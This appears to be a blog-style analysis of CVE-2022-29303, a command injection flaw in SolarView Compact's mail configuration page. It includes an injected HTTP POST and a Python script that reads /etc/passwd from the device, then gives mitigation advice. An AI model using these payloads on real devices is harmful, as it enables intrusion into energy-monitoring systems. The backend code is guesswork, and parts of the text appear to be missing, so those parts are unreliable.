CVE-2022-29303 - Command Injection in SolarView Compact ver.6.00 via conf_mail.php — Detailed Analysis & Exploit Example

In April 2022, a significant vulnerability — CVE-2022-29303 — was publicly disclosed, affecting SolarView Compact version 6.00. This device, widely used to monitor solar power systems, was discovered to have a severe command injection vulnerability in its configuration interface. The flaw can allow attackers to execute arbitrary system commands directly on the device, potentially compromising entire solar energy networks.

This long read covers how the vulnerability works, offers practical exploit examples, and gives mitigation advice, all in plain, easy-to-understand language.

What Is SolarView Compact?

SolarView Compact is a web-based monitoring solution for solar installation management. End-users or administrators interact with the device primarily through its web browser interface. Ensuring the security of this device is crucial — a compromised device means attackers could manipulate or disrupt solar energy operations.

Details of the Vulnerability

Vulnerability Name: CVE-2022-29303  
Affected Product: SolarView Compact ver.6.00  
Component: conf_mail.php (Mail configuration script)  
Type: Command Injection

What's Happening?

The web interface at /conf_mail.php lets authorized users adjust the device's email settings. The problem appears when user-supplied input isn't properly sanitized or checked before being passed to the operating system's shell. This means any command inserted into certain parameters gets run directly!

How the Attack Works

The vulnerability lies in how the backend code assembles and executes shell commands, especially when handling POST data sent through the configuration page.

Scenario:  
An attacker, possibly after gaining access or through phishing/social engineering, accesses the /conf_mail.php endpoint and crafts a malicious request that injects system commands as part of the email settings.

A typical configuration submission might look like this (HTTP POST)

POST /conf_mail.php HTTP/1.1
Host: [target_device_ip]
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=[session_id]

mail_server=smtp.example.com&mail_port=25&mail_user=user@example.com&mail_pass=secret

2. Exploiting the Vulnerability

Suppose the mail_server parameter is used unsafely in a shell command. An attacker can inject a command like this:

POST /conf_mail.php HTTP/1.1
Host: [target_device_ip]
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=[session_id]

mail_server=smtp.example.com;id;&mail_port=25&mail_user=user@example.com&mail_pass=secret

Here, ;id; breaks out of the expected value and invokes the id command, which lists user info on Linux.

3. What Happens in the Backend

Although we don't have access to 100% of the source code, it's likely the code contains something like:

<?php
// Pseudo vulnerable snippet
$mail_server = $_POST['mail_server'];
// BAD: directly inserting user input into a shell command
system("/usr/local/bin/configure_mail --server {$mail_server}");
?>

In this sample, if the attacker sends smtp.example.com;id; as the mail server, it becomes

/usr/local/bin/configure_mail --server smtp.example.com;id;

So the shell runs the real config command, AND also runs id!

Let's automate the above attack using Python and the requests library

import requests

target = 'http://[target_device_ip]/conf_mail.php';
session_id = '[valid_session_id]'  # Assuming session is already authenticated

payload = "smtp.example.com;cat /etc/passwd;" # Try reading passwd file

data = {
    'mail_server': payload,
    'mail_port': '25',
    'mail_user': 'attacker@example.com',
    'mail_pass': '123456'
}

headers = {
    'Content-Type': 'application/x-www-form-urlencoded',
    'Cookie': 'PHPSESSID=' + session_id
}

response = requests.post(target, data=data, headers=headers)
print(response.text)

Note:

You need an authenticated session unless the app allows unauthenticated access.

- The output of the command may show up in the server's web response, the user interface, or somewhere else (like emailed results).

Launch attacks on other networked devices

This vulnerability grants a critical level of access.

Mitigation & Recommendations

1. Upgrade: Always use the latest patched firmware. Check vendor advisories or contact support for updates.
2. Isolate Devices: Limit device network exposure — never expose management interfaces directly to the internet.

Strong Credentials: Use strong, unique passwords for all accounts.

4. Input Validation: Developers — always sanitize and validate external input before referencing it in system commands.
5. Monitor Logs: Watch device/system logs for suspicious activity.

References

- NVD - CVE-2022-29303
- GitHub Advisory Database - CVE-2022-29303
- JVN - JVN#19957007
- Exploit Proof-of-Concept (Exploit Database, Japanese)

Final Thoughts

CVE-2022-29303 highlights how dangerous it can be when user input is carelessly handled in backend scripts on embedded devices. SolarView Compact version 6.00's misuse of shell inputs in conf_mail.php could let attackers take over the system, disrupt solar monitoring, and move deeper into critical infrastructure.

If you use SolarView products or similar hardware, double-check your device security today. Don’t wait for disaster to strike — patch, isolate, and harden!


> Stay safe, patch regularly, and always be wary of what goes behind the web interface!

Timeline

Published on: 05/12/2022 16:15:00 UTC
Last modified on: 05/20/2022 17:23:00 UTC